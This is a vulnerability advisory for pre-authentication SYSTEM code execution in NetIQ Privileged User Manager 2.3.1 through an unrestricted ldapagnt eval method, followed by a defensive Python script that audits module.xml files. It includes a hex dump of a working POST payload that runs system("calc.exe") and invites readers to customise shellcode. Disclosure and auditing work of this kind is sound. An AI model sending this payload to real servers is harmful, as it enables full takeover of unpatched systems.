Novell NetIQ Privileged User Manager 2.3.1 ldapagnt.dll ldapagnt_eval() 
Perl Code Evaluation RCE (pre auth/SYSTEM)

Tested against: Microsoft Windows 2003 r2 sp2
download url: http://download.novell.com/index.jsp
(search "Privileged User Manager")
file tested: NetIQ-PUM-2.3.1.iso
(decompress and launch netiq_pum_manager_2.3.1_x86.msi)

Background:
The product installs a Windows service (unifid.exe) named 'npum',
display name "NetIQ Privileged User Manager", which listens on the
default TCP port 443 (https) for incoming connections.

Vulnerability:
The secure web interface contains a flaw that allows a remote user,
without prior authentication, to execute a Perl script with SYSTEM
privileges. This can be done by sending a POST request with well-formed
data.

Example data:
  0 : 00 00 00 00 00 01 00 14 53 50 46 2e 55 74 69 6c [........SPF.Util]
 10 : 2e 63 61 6c 6c 4d 6f 64 75 6c 65 41 00 00 00 00 [.callModuleA....]
 20 : 02 0a 0a 00 00 00 01 03 00 03 70 6b 74 03 00 06 [..........pkt...]
 30 : 6d 65 74 68 6f 64 02 00 04 65 76 61 6c 00 06 6d [method...eval..m]
 40 : 6f 64 75 6c 65 02 00 08 6c 64 61 70 61 67 6e 74 [odule...ldapagnt]
 50 : 00 04 45 76 61 6c 03 00 07 63 6f 6e 74 65 6e 74 [..Eval...content]
 60 : 02 00 17 73 79 73 74 65 6d 28 22 63 61 6c 63 2e [...system("calc.]
 70 : 65 78 65 22 29 3b 0a 0a 31 3b 0a 0a 31 3b 00 00 [exe");..1;..1;..]
 80 : 09 00 00 09 00 03 75 69 64 02 00 00 00 00 09 00 [......uid.......]
 90 : 08 73 76 63 5f 6e 61 6d 65 02 00 06 61 6e 64 72 [.svc_name...andr]
 A0 : 65 61 00 00 09 [ea...]

Note that the uid argument is empty.

Explanation:

Open C:\Program Files\Novell\npum\service\local\ldapagnt\module.xml
(this is the configuration file of the 'ldapagnt' module).

...
    <Library type="dso" lib="lib/ldapagnt">
      <Method name="init_ldap_cred" init="init_ldapcred" /> 
      <Method name="eval" svc="ldapagnt_eval" />       <--------------------------
    </Library>
...

No role is defined for the eval() method, which corresponds to
the ldapagnt_eval() function inside ldapagnt.dll.
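
An added example, not part of the original advisory or the vendor's code: a Python audit that walks a service directory and lists every Method with an svc handler and no role restriction in any module.xml it finds. The advisory does not show how a role is written in module.xml, so treating any tag or attribute whose name contains "role" as a restriction is an assumption, as are the Module root element and the "guarded" method in the constructed sample.

```python
import os
import tempfile
import xml.etree.ElementTree as ET

def has_role(elem):
    # ASSUMPTION: the role syntax is not shown in the advisory, so any tag or
    # attribute whose name contains "role" counts as a restriction.
    for node in elem.iter():
        if "role" in node.tag.lower():
            return True
        if any("role" in key.lower() for key in node.attrib):
            return True
    return False

def audit_module_xml(path):
    """Return (library, method, handler) for each svc method with no role."""
    findings = []
    for lib in ET.parse(path).getroot().iter("Library"):
        for method in lib.iter("Method"):
            if "svc" in method.attrib and not has_role(method):
                findings.append((lib.get("lib"), method.get("name"), method.get("svc")))
    return findings

def audit_tree(service_dir):
    """Audit every module.xml below service_dir (the npum service/local tree)."""
    report = {}
    for dirpath, _dirs, files in os.walk(service_dir):
        if "module.xml" in files:
            path = os.path.join(dirpath, "module.xml")
            try:
                hits = audit_module_xml(path)
            except ET.ParseError as exc:
                hits = [(None, "unparseable: %s" % exc, None)]
            if hits:
                report[path] = hits
    return report

# Constructed sample: the Library fragment quoted in the advisory, wrapped in a
# hypothetical <Module> root, plus a hypothetical role-restricted method.
SAMPLE = """<Module>
  <Library type="dso" lib="lib/ldapagnt">
    <Method name="init_ldap_cred" init="init_ldapcred" />
    <Method name="eval" svc="ldapagnt_eval" />
    <Method name="guarded" svc="guarded_fn" role="admin" />
  </Library>
</Module>"""

def demo():
    """Write SAMPLE into a temporary module tree and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        os.makedirs(os.path.join(tmp, "ldapagnt"))
        with open(os.path.join(tmp, "ldapagnt", "module.xml"), "w") as fh:
            fh.write(SAMPLE)
        return list(audit_tree(tmp).values())

if __name__ == "__main__":
    print(demo())
```

Each finding is a handler to review by hand, since a method may be restricted by a mechanism this heuristic does not recognise.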

Attached is proof of concept code, which launches calc.exe
remotely. Customize the shellcode for your own use.